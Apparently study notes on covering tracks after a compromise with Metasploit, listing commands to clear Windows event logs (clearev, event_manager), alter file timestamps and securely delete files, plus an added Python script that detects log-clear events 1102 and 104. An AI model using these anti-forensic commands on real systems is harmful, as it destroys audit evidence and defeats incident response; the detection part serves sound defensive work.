covering_tracks
We can delete all logs with:
clearev
However, this can look suspicious, so we can delete logs selectively instead, for example:
run event_manager -h
run event_manager -i # shows the type of logs we can delete
run event_manager -c "Windows Powershell" # clears all windows powershell logs
run event_manager -l Application # lists the logs related to the "Application" category
run event_manager -l Application -s /tmp/ApplicationLogs.txt # saves the logs to our machine so that we can inspect them more comfortably
Once we have these logs, we can open them with, for example, LibreOffice Calc or equivalent software and search for our (the attacker's) IP address. If it is there, we can proceed with removing the entire Application logs.
Note that in the current version of Metasploit we cannot remove single entries from a log; we can only remove whole categories (or sections).
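The defender's view of the log clearing described above, as an added example that is not part of the original notes: Windows records a clear as event 1102 in the Security log (when Security itself is cleared) and as event 104 in the System log (for other logs), so removing a single category still produces a record. The script below flags those records in an XML export of events; the sample records, the host and user names, the simplified element layout and the `<Events>` wrapper element are constructed for this example.

```python
import xml.etree.ElementTree as ET

# (log the record is written to, event ID) pairs that mean "a log was cleared".
CLEAR_EVENTS = {("Security", 1102), ("System", 104)}

# Constructed sample export; host, user and times are made up.
SAMPLE = """<Events xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<Event><System><EventID>7036</EventID>
  <TimeCreated SystemTime="2024-01-01T09:58:00Z"/><Channel>System</Channel>
  <Computer>WS01.example.test</Computer></System></Event>
<Event><System><EventID>104</EventID>
  <TimeCreated SystemTime="2024-01-01T10:00:05Z"/><Channel>System</Channel>
  <Computer>WS01.example.test</Computer></System>
  <UserData><LogFileCleared xmlns="http://manifests.microsoft.com/win/2004/08/windows/eventlog">
    <SubjectUserName>svc_web</SubjectUserName><Channel>Windows PowerShell</Channel>
  </LogFileCleared></UserData></Event>
<Event><System><EventID>1102</EventID>
  <TimeCreated SystemTime="2024-01-01T10:00:09Z"/><Channel>Security</Channel>
  <Computer>WS01.example.test</Computer></System>
  <UserData><LogFileCleared xmlns="http://manifests.microsoft.com/win/2004/08/windows/eventlog">
    <SubjectUserName>svc_web</SubjectUserName>
  </LogFileCleared></UserData></Event>
</Events>"""


def find_log_clears(xml_text):
    """Return one dict per log-clear record found in an event XML export."""
    hits = []
    for ev in ET.fromstring(xml_text).findall(".//{*}Event"):
        channel = ev.findtext("{*}System/{*}Channel")
        event_id = int(ev.findtext("{*}System/{*}EventID"))
        if (channel, event_id) not in CLEAR_EVENTS:
            continue  # ordinary record, e.g. the 7036 entry in the sample
        detail = "{*}UserData/{*}LogFileCleared/"
        hits.append({
            "time": ev.find("{*}System/{*}TimeCreated").get("SystemTime"),
            "host": ev.findtext("{*}System/{*}Computer"),
            # 104 names the cleared log; a 1102 record refers to Security itself.
            "cleared_log": ev.findtext(detail + "{*}Channel") or channel,
            "user": ev.findtext(detail + "{*}SubjectUserName"),
        })
    return hits


if __name__ == "__main__":
    for hit in find_log_clears(SAMPLE):
        print(hit)
```

Run against logs forwarded to a central collector, the same check keeps working when the local copies on the host have been cleared.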
We may also need to change the timestamps of files with the timestomp command, or shred a file.
If we want to remove a file and be sure nobody can retrieve it, we should use sdel.